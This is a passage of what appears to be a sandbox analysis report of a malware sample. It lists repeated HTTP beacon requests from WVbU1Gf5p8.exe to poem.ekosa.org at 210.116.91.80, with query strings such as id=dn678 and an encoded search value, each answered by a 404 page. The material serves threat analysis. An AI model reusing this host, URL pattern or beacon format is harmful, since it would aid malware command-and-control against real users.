      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      243192.168.2.450023210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:18.165337086 CET5290OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:18.430999041 CET5291INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:17 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      244192.168.2.450024210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:18.698347092 CET5292OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:18.958631992 CET5292INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:18 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      245192.168.2.450025210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:19.233356953 CET5293OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:19.495107889 CET5294INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:18 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      246192.168.2.450026210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:19.880944014 CET5294OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:20.141428947 CET5295INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:20 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      247192.168.2.450027210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:20.407540083 CET5295OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:20.667928934 CET5296INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:20 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      248192.168.2.450028210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:20.939857006 CET5297OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:21.203788042 CET5297INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:21 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      249192.168.2.450029210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:21.590358973 CET5298OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:21.861025095 CET5298INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:21 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      25192.168.2.449789210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:11.295078993 CET395OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:11.574569941 CET396INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:10 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      250192.168.2.450030210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:22.137531996 CET5299OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:22.406336069 CET5300INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:22 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      251192.168.2.450031210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:22.675158978 CET5300OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:22.936172962 CET5301INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:22 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      252192.168.2.450032210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:23.319056988 CET5302OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
